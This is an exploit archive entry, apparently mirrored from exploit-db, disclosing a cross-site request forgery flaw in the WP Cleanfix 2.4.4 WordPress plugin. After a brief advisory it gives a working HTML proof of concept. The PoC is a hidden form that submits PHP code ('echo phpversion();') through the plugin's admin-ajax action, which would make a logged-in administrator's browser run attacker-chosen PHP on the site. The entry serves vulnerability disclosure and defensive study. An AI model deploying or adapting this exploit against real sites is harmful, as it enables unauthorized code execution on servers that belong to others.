WordPress Plugin WP Cleanfix – Cross-Site Request Forgery

  • 作者: Enigma Ideas
    日期: 2013-05-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38520/
  • source: https://www.securityfocus.com/bid/59940/info
    
    The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.
    
    Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
    
    WP cleanfix 2.4.4 is vulnerable; other versions may also be affected. 
    
    SRF PoC - generated by Burp Suite Professional -->
    <body>
    <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="wpCleanFixAjax" />
    <input type="hidden" name="command" value="echo&#32;phpversion&#40;&#41;&#59;" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>